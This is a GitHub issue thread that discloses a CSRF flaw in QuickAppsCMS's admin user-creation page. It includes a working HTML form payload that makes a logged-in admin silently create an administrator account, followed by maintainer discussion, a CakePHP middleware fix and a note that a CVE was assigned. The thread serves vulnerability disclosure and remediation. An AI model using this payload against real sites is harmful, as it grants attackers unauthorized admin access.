quickapps / cms

Modular CMS powered by CakePHP
GNU General Public License v3.0

CSRF issue that allows attacker to create an account #187

Open fvi-att opened 6 years ago

fvi-att commented 6 years ago

Hello. I'd like to report a security issue on the admin page.

Summary

This vuln is a CSRF vuln that allows creating any kind of account.

When an attacker induces authorized victims to a malicious webpage and makes them send requests, a victim creates an account without their intent.

Reproduce

These are the steps to reproduce.

  1. Access the HTML page containing the payload after you log in to the admin (/en_US/admin/) page.

Then you will find that an admin account named [test] has been created.

Payloads

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://your.cms.domain.example.com/en_US/admin/user/manage/add" method="POST">
      <input type="hidden" name="&#95;method" value="POST" />
      <input type="hidden" name="name" value="test" />
      <input type="hidden" name="username" value="test" />
      <input type="hidden" name="email" value="test&#64;example&#46;com" />
      <input type="hidden" name="web" value="" />
      <input type="hidden" name="locale" value="" />
      <input type="hidden" name="status" value="0" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="password" value="testtest" />
      <input type="hidden" name="password2" value="testtest" />
      <input type="hidden" name="roles&#91;&#95;ids&#93;" value="" />
      <input type="hidden" name="roles&#91;&#95;ids&#93;&#91;&#93;" value="1" />
      <input type="hidden" name="welcome&#95;message" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

I think this security issue is not serious, because an attack using this vulnerability requires induction.


botchris commented 6 years ago

Fixing CSRF in QACMS in general may produce several problems as QACMS heavily relies on AJAX and dynamic forms building. We could try to secure certain sections of the CMS, such as content/user editing forms, etc.
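For reference, this is the shape of the fix the report above calls for and the AJAX concern raised in this comment can be handled with: an added example written for this thread, not code from QuickAppsCMS. It assumes a CakePHP 3.5+ bootstrap with a `src/Application.php` (the middleware class and its `httpOnly`/`secure` options are CakePHP's; the file layout and the `csrf-token` meta tag name are assumptions).

```php
<?php
// src/Application.php: CSRF protection for every state-changing request.
// Uses CakePHP 3.5+ CsrfProtectionMiddleware; the bootstrap layout is
// assumed, this is not QuickAppsCMS's own code.
namespace App;

use Cake\Http\BaseApplication;
use Cake\Http\Middleware\CsrfProtectionMiddleware;

class Application extends BaseApplication
{
    public function middleware($middlewareQueue)
    {
        $csrf = new CsrfProtectionMiddleware([
            'httpOnly' => true,  // page scripts never see the cookie value
            'secure'   => true,  // assumes the admin UI is served over HTTPS
        ]);
        // The middleware sets a random `csrfToken` cookie and rejects any
        // POST/PUT/PATCH/DELETE whose `_csrfToken` form field or
        // `X-CSRF-Token` header does not match it (InvalidCsrfTokenException,
        // HTTP 403). A form on an attacker's origin cannot read or forge that
        // value, so the cross-site POST to /admin/user/manage/add in the
        // report is refused before the controller runs.
        $middlewareQueue->add($csrf);
        return $middlewareQueue;
    }
}

// src/Template/Layout/default.ctp: FormHelper::create() adds the hidden
// `_csrfToken` field to server-rendered forms automatically. For AJAX and
// dynamically built forms, expose the token once in the layout
// (the meta tag name is an assumption):
//   <meta name="csrf-token"
//         content="<?= h($this->request->getParam('_csrfToken')) ?>">
// and have the client send it back with every request:
//   xhr.setRequestHeader('X-CSRF-Token',
//       document.querySelector('meta[name="csrf-token"]').content);
```

Because the check is enforced in middleware rather than per form, securing only "certain sections" is not necessary: every dynamically built form works as long as the client echoes the header.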

NicoleG25 commented 4 years ago

@ChristopherCastro do you plan to address this? Note that a CVE was assigned to this issue. If you disagree with the assignment you may contact MITRE directly to reject the CVE.